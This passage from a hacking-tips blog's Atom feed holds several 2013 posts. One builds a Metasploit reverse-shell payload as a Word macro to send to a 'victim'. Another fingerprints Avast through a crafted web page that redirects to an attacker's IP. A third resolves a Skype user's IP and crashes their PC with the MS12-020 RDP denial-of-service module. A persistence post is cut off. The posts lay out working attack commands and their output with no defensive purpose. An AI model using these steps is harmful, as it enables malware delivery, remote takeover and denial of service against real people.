</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/189299860145992756/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/189299860145992756'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/189299860145992756'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html' title='Backdoor using Netcat, cryptcat , ncat.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRWM2IiHQjfn9s5ENFozp_2ZI52SAW6aVMC11G-JTl0f8YYqEVIhKmcctZtWxVKCLpwRienjO2Hu6GCx0CxH3ZCe_JDDTZyvkYt3pm1KJhUMyTPacJnYJ6bI5WLK-0-IL80SPjyoQtzVFn/s72-c/netcat-virus.PNG" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-3288610465911552663</id><published>2013-10-18T15:12:00.001+05:30</published><updated>2013-10-18T15:16:11.268+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Get shell Using Shellcode in Macro.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.&lt;br /&gt;
&lt;br /&gt;
msfconsole&lt;br /&gt;
use payload/windows/meterpreter/reverse_tcp&lt;br /&gt;
set LHOST 192.168.56.102&lt;br /&gt;
set LPORT 443&lt;br /&gt;
generate -t vba&lt;br /&gt;
exploit &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_EmNVkKWxnIg6uXw5vZfzKTUYnOCVrrUxBk87d5SNusJOUnIySDO8wMdUkX6KIxxca_5dF5rUT6ARyQnhYftgWNe7GiiKTZh0HC7-AxU2A2f2i-Dy1SOWQc7-hXd0glc5q8p9jvGnJ4V7/s1600/Screenshot.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_EmNVkKWxnIg6uXw5vZfzKTUYnOCVrrUxBk87d5SNusJOUnIySDO8wMdUkX6KIxxca_5dF5rUT6ARyQnhYftgWNe7GiiKTZh0HC7-AxU2A2f2i-Dy1SOWQc7-hXd0glc5q8p9jvGnJ4V7/s1600/Screenshot.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
Now we have generated our shellcode. Now we will create macro.&lt;br /&gt;
&lt;br /&gt;
(1)Open any word or Excell document&lt;br /&gt;
&lt;br /&gt;
(2)Click on view &amp;amp; then click on Macros.&lt;br /&gt;
&lt;br /&gt;
(3)Give name to macro &amp;amp; create macro.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtUuojSocQmJ3Hms1I4Tb4E2I2pAreK43aO9gafT7zX54_zdStzmha0HaKh8USU8ylmEfFaBHxV5GBg67QeOaHuytEIzM_y_hHQP907FAzU6zMYPP8Om7hWc88VcwcT5VJ7HPSVwyhVZi3/s1600/macro-1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;188&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtUuojSocQmJ3Hms1I4Tb4E2I2pAreK43aO9gafT7zX54_zdStzmha0HaKh8USU8ylmEfFaBHxV5GBg67QeOaHuytEIzM_y_hHQP907FAzU6zMYPP8Om7hWc88VcwcT5VJ7HPSVwyhVZi3/s320/macro-1.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
(4)Remove all things from modules windows &amp;amp; Paste our generated VB code.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPT5Bp6pN4RyrCTXX54tSuRNtGFOTvFcI6fPODxucaDrgvcQHxDpV3OSxHTMpew28mvTrHmIHhhog6fOwguUfFXqozADmvym1ADh0l1MyD-J9YEKw3CQbz7iwPHsG9YDNHFP58qE0tgK_q/s1600/macro-2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;161&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPT5Bp6pN4RyrCTXX54tSuRNtGFOTvFcI6fPODxucaDrgvcQHxDpV3OSxHTMpew28mvTrHmIHhhog6fOwguUfFXqozADmvym1ADh0l1MyD-J9YEKw3CQbz7iwPHsG9YDNHFP58qE0tgK_q/s320/macro-2.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
(5)Saved it as type Word Macro-Enabled Document.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSO8JNuPDWFsm13wP24FjzNfyLL4q-YU07cB8uAV6D7i9-k_thIo4WszVvyzOW1al7dsYQG1rwbEramcAGGdgxx4EhB9qtbYGGeiU_RjBTJ_wrErRO6Id1EubOREqiIjzUznJD6zCNJR5w/s1600/main-3.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSO8JNuPDWFsm13wP24FjzNfyLL4q-YU07cB8uAV6D7i9-k_thIo4WszVvyzOW1al7dsYQG1rwbEramcAGGdgxx4EhB9qtbYGGeiU_RjBTJ_wrErRO6Id1EubOREqiIjzUznJD6zCNJR5w/s320/main-3.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Send this file to victim. By default in MS Office&lt;b&gt;&amp;nbsp; &lt;/b&gt;&lt;span class=&quot;runinhead&quot;&gt;&quot; Disable all macros with notification&lt;/span&gt;
 &quot; option is enabled , so whenever any document try to execute Macro it 
will pop up security warning that macro is disable ; so to execute our 
shellcode using macro victim should click on Enable content.&lt;br /&gt;
&lt;br /&gt;
You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener &lt;br /&gt;
&lt;br /&gt;
use exploit/multi/handler &lt;br /&gt;
set lhost 192.168.56.102&lt;br /&gt;
set lport 443&lt;br /&gt;
set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
set autorunscript migrate -n explorer.exe&lt;br /&gt;
exploit&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVOCpTW9eW-G03W8V1_NeBNm4ZaS4qHQbBpNZcjjHHNhriJvvouqLdyiQQNbqY81Y5Tjmx3oZMKPA9MMoE1gD_hBoua8Zhyphenhypheniwvw4VWqpEr7CFtJnS7rV_TZSkaQ4DzfRMGaw-fY5ikGSvD/s1600/Screenshot-2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;276&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVOCpTW9eW-G03W8V1_NeBNm4ZaS4qHQbBpNZcjjHHNhriJvvouqLdyiQQNbqY81Y5Tjmx3oZMKPA9MMoE1gD_hBoua8Zhyphenhypheniwvw4VWqpEr7CFtJnS7rV_TZSkaQ4DzfRMGaw-fY5ikGSvD/s400/Screenshot-2.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Here we setup migrate script as autorunscript so when document will closed our shell will not die.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/3288610465911552663/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3288610465911552663'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3288610465911552663'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html' title='Get shell Using Shellcode in Macro.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_EmNVkKWxnIg6uXw5vZfzKTUYnOCVrrUxBk87d5SNusJOUnIySDO8wMdUkX6KIxxca_5dF5rUT6ARyQnhYftgWNe7GiiKTZh0HC7-AxU2A2f2i-Dy1SOWQc7-hXd0glc5q8p9jvGnJ4V7/s72-c/Screenshot.png" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-3055421055711209553</id><published>2013-10-14T19:49:00.001+05:30</published><updated>2013-10-14T19:54:13.232+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="TRICK"/><title type='text'>How to detect Avast Antivirus remotely?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV &amp;amp; install it in virtual box &amp;amp; try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?&lt;br /&gt;
&lt;br /&gt;
Original video is posted &lt;a href=&quot;http://www.securitytube.net/video/8571&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3v7hf3LRHRN1e7pYaBUTlIY-jbUzsJI1221LEpob4ha9VKouhLDEl97A3FS9VNi122rXC8SBOwDBsfN3ELRQz4w_d6Er5At2ii4jKYoEi9kdMkv0JOJq-DAYEzdqVHWrFZSFEDSZ8VhkQ/s1600/Avast-Site-Blocking.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;How-to-detect-Avast-Antivirus-remotely&quot; border=&quot;0&quot; height=&quot;194&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3v7hf3LRHRN1e7pYaBUTlIY-jbUzsJI1221LEpob4ha9VKouhLDEl97A3FS9VNi122rXC8SBOwDBsfN3ELRQz4w_d6Er5At2ii4jKYoEi9kdMkv0JOJq-DAYEzdqVHWrFZSFEDSZ8VhkQ/s320/Avast-Site-Blocking.png&quot; title=&quot;How-to-detect-Avast-Antivirus-remotely&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
In above image you can see that avast logo which address is localhost:12080/$$avast-webshield$$/image001.png . So if in client machine avast is installed than that image is also located at that address , by examine image is exist or not we can know that whether avast is installed or not.&lt;br /&gt;
&lt;br /&gt;
For this purpose victim should visit&amp;nbsp; our link where we can check about image.So i am gonna use my apache server ; where i put three html page. One is our link which we gonna send to victim ; if image exist it redirect to other document ; &amp;amp; if image does not exist it redirect to third html page.&lt;br /&gt;
&lt;br /&gt;
(1)Make blank html page &amp;amp; give it to name avst.html &amp;amp; put following code in that html page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;meta http-equiv=&quot;refresh&quot; content=&quot;0; url=http://google.com/&quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
(2)Now make second html page &amp;amp; give it to name ntavst.html &amp;amp; put same code in that page. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;meta http-equiv=&quot;refresh&quot; content=&quot;0; url=http://google.com/&quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
(3)Make third &amp;amp; final html page and give it to name exp.html &amp;amp; put following code.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;img src=&quot;http://127.0.0.1:12080/$$avast-webshield$$&quot;/image001.png&quot; onload=&quot;document.location=&#39;http://180.215.198.150/avast.html&#39;&quot; onerror=&quot;document.location=&#39;http://180.215.198.150/ntavast.html&#39;&quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Note:- Change your i.p in above code.&lt;br /&gt;
&lt;br /&gt;
Now put these all document in /var/www/ folder.And send link of exp.html to victim&lt;br /&gt;
&lt;br /&gt;
So if avast installed then it redirect to avast.html page &amp;amp; finally redirect to google.com &amp;amp; if it does not installed then it will redirect to ntavst.html page &amp;amp; then redirect to google.com&lt;br /&gt;
&lt;br /&gt;
Now check your apache log file from \var\log\apache2\log ; you can check if avst.html page has been visited or ntavst.html page.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigty1rfKnTIvhPkO5jnVi58-QCXYW2rqpOdtpJRaRm-qW-Drg1s7_Y2I7pLBQhxAtlr32m9k4jN6ghAwipj163U85iEUcS-6UxhX5MS0yW5hOOYXxdZVQ0Gmyj1qlezTgCaKCVt5Su6c9G/s1600/nt_avast.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;How-to-detect-Avast-Antivirus-remotely&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigty1rfKnTIvhPkO5jnVi58-QCXYW2rqpOdtpJRaRm-qW-Drg1s7_Y2I7pLBQhxAtlr32m9k4jN6ghAwipj163U85iEUcS-6UxhX5MS0yW5hOOYXxdZVQ0Gmyj1qlezTgCaKCVt5Su6c9G/s1600/nt_avast.PNG&quot; title=&quot;How-to-detect-Avast-Antivirus-remotely&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: #38761d;&quot;&gt;PS: You can use cobalt strike `s system profiler which get you os version;&amp;nbsp; browser detail; java version ; adobe reader&amp;nbsp; version &amp;amp; flash version.&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/3055421055711209553/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3055421055711209553'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3055421055711209553'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html' title='How to detect Avast Antivirus remotely?'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3v7hf3LRHRN1e7pYaBUTlIY-jbUzsJI1221LEpob4ha9VKouhLDEl97A3FS9VNi122rXC8SBOwDBsfN3ELRQz4w_d6Er5At2ii4jKYoEi9kdMkv0JOJq-DAYEzdqVHWrFZSFEDSZ8VhkQ/s72-c/Avast-Site-Blocking.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-3188028616351432095</id><published>2013-10-11T19:06:00.000+05:30</published><updated>2014-10-18T13:36:44.858+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Fun with skype resolver</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.&lt;br /&gt;
&lt;br /&gt;
If your victim is in your friend-list &amp;amp; you are using linux ; then it`s very simple to get his I.P. &lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;netstat -tupan | grep skype &amp;gt; n1&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Now chat with your victim; as soon as you got reply use following command.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;netstat -tupan | grep skype &amp;gt; n2&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;diff n1 n2 &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Now we have I.P. of victim.&lt;br /&gt;
&lt;br /&gt;
In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.You can also use bash script for getting ip of victim which i wrote.&lt;br /&gt;
&lt;br /&gt;
root@bt:~# git clone https://github.com/niravkdesai/skypersolver.sh&lt;br /&gt;&lt;br /&gt;root@bt:~# cd skypersolver.sh/&lt;br /&gt;
&lt;br /&gt;root@bt:~/skypersolver.sh# sh skypersolver.sh &lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
Use one of following&amp;nbsp; links to get I.P. of your victim using his skype user-name.&lt;br /&gt;
&lt;br /&gt;
(1)&lt;a href=&quot;http://www.skyperesolver.com/&quot;&gt;http://www.skyperesolver.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(2)&lt;a href=&quot;http://skresolver.com/&quot; target=&quot;_blank&quot;&gt;http://skresolver.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(3)&lt;a href=&quot;http://www.speedresolve.com/resolve.php&quot;&gt;http://www.speedresolve.com/resolve.php&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(4)&lt;a href=&quot;http://skypegrab.com/skype-beta&quot;&gt;http://skypegrab.com/skype-beta &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
(5)&lt;a href=&quot;http://iskyperesolve.com/&quot;&gt;http://iskyperesolve.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Okay we got I.P. Now you can directly DOS or DDOS( ddos and dos attacks are illegal) them . But we are going to use different technique to shutdown your victim pc using RDP.&lt;br /&gt;
&lt;br /&gt;
First scan ip to find open ports of victim.&lt;br /&gt;
&lt;br /&gt;
root@bt:~# nmap 192.168.56.101&lt;br /&gt;
&lt;br /&gt;
Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST&lt;br /&gt;
Nmap scan report for 192.168.56.101&lt;br /&gt;
Host is up (0.00077s latency).&lt;br /&gt;
Not shown: 995 filtered ports&lt;br /&gt;
PORT&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; STATE&amp;nbsp; SERVICE&lt;br /&gt;
139/tcp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; open&amp;nbsp;&amp;nbsp; netbios-ssn&lt;br /&gt;
445/tcp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; open&amp;nbsp;&amp;nbsp; microsoft-ds&lt;br /&gt;
2869/tcp&amp;nbsp;&amp;nbsp; closed icslap&lt;br /&gt;
3389/tcp&amp;nbsp;&amp;nbsp; open&amp;nbsp;&amp;nbsp; ms-wbt-server&lt;br /&gt;
10243/tcp closed unknown&lt;br /&gt;
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLgvu1o_go2aRM2pYy7q3GciFAA-UuRY8x3SwUtZZ511UqHbAuC1twPCWcwOGkcUFYTwYb6tpUVmfSNlaiSJSIhfdfE-tIcKjNGdeh4AIVDN5_ocQ-0K0UTkusP5Zj5Gz7Qpa2vrzQFjdo/s1600/nmap-scan.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;nmap-scan&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLgvu1o_go2aRM2pYy7q3GciFAA-UuRY8x3SwUtZZ511UqHbAuC1twPCWcwOGkcUFYTwYb6tpUVmfSNlaiSJSIhfdfE-tIcKjNGdeh4AIVDN5_ocQ-0K0UTkusP5Zj5Gz7Qpa2vrzQFjdo/s400/nmap-scan.PNG&quot; height=&quot;148&quot; title=&quot;namp-scan&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
From result we can see that port 3389 is open which is used for RDP.&lt;br /&gt;
&lt;br /&gt;
Now we will use metasploit Auxiliary module to check vulnerability.&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use auxiliary/scanner/rdp/ms12_020_check &lt;br /&gt;
msf auxiliary(ms12_020_check) &amp;gt; set RHOSTS 192.168.56.101&lt;br /&gt;
RHOSTS =&amp;gt; 192.168.56.101&lt;br /&gt;
msf auxiliary(ms12_020_check) &amp;gt; run&lt;br /&gt;
&lt;br /&gt;
[+] 192.168.56.101:3389 Vulnerable to MS12-020&lt;br /&gt;
[*] Scanned 1 of 1 hosts (100% complete)&lt;br /&gt;
[*] Auxiliary module execution completed&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKGKw25pp9qm5wC2zhHxbk9HnrwOcrZzJMThiK01CvrxgbnP8Q-BbSjQFvksrCDGakZjX0rgFV7WcCa9r0EziZe9jfQOsmjdMxIXNparXzwfwpIJm8gflYQCxFMKMqNuzYk23oWv9hOyPn/s1600/check-vulnerability.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;check-for-vulnerability&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKGKw25pp9qm5wC2zhHxbk9HnrwOcrZzJMThiK01CvrxgbnP8Q-BbSjQFvksrCDGakZjX0rgFV7WcCa9r0EziZe9jfQOsmjdMxIXNparXzwfwpIJm8gflYQCxFMKMqNuzYk23oWv9hOyPn/s400/check-vulnerability.PNG&quot; height=&quot;194&quot; title=&quot;check-for-vulnerability&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Okay we got that host is vulnerable to MS12-020.Now we will use metasploit module to Dos that I.p.&lt;br /&gt;
&lt;br /&gt;
msf auxiliary(ms12_020_check) &amp;gt; use auxiliary/dos/windows/rdp/ms12_020_maxchannelids&lt;br /&gt;
msf auxiliary(ms12_020_maxchannelids) &amp;gt; set RHOST 192.168.56.101&lt;br /&gt;
RHOST =&amp;gt; 192.168.56.101&lt;br /&gt;
msf auxiliary(ms12_020_maxchannelids) &amp;gt; run&lt;br /&gt;
&lt;br /&gt;
[*] 192.168.56.101:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS&lt;br /&gt;
[*] 192.168.56.101:3389 - 210 bytes sent&lt;br /&gt;
[*] 192.168.56.101:3389 - Checking RDP status...&lt;br /&gt;
[+] 192.168.56.101:3389 seems down&lt;br /&gt;
[*] Auxiliary module execution completed&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTgaTg-MxhsX-wVYKFYYHJ7LksZI0QkEoQvs4YJ6tkxpbhggOJIN56AVLCDJV_1Nsgkcz8V_2iIlTiGyP96pTcn8VD_PIsjFNOODAmrRoZv_np0bExhC6ai3XdW_nUEYc81dv7PFlfOIst/s1600/exploit.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;exploit-RDP&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTgaTg-MxhsX-wVYKFYYHJ7LksZI0QkEoQvs4YJ6tkxpbhggOJIN56AVLCDJV_1Nsgkcz8V_2iIlTiGyP96pTcn8VD_PIsjFNOODAmrRoZv_np0bExhC6ai3XdW_nUEYc81dv7PFlfOIst/s400/exploit.PNG&quot; height=&quot;216&quot; title=&quot;exploit-RDP&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
And bingo ; your victim machine should be restarted. :)&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/3188028616351432095/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3188028616351432095'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3188028616351432095'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html' title='Fun with skype resolver'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLgvu1o_go2aRM2pYy7q3GciFAA-UuRY8x3SwUtZZ511UqHbAuC1twPCWcwOGkcUFYTwYb6tpUVmfSNlaiSJSIhfdfE-tIcKjNGdeh4AIVDN5_ocQ-0K0UTkusP5Zj5Gz7Qpa2vrzQFjdo/s72-c/nmap-scan.PNG" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-3685936234014291127</id><published>2013-10-07T13:20:00.002+05:30</published><updated>2013-10-07T13:32:07.779+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><category scheme="http://www.blogger.com/atom/ns#" term="post-exploitation"/><title type='text'>Get shell using Missing Autoruns.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
In &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html&quot; target=&quot;_blank&quot;&gt;previous post&lt;/a&gt; we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.&lt;br /&gt;
&lt;br /&gt;
(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry &amp;amp; whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.&lt;br /&gt;
&lt;br /&gt;
After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.&lt;br /&gt;
&lt;br /&gt;
(1)Get meterpreter shell.&lt;br /&gt;
&lt;br /&gt;
(2)Upload sysinternal`s autoruns.exe &amp;amp; autorun.exe to victim machine.&lt;br /&gt;
&lt;br /&gt;
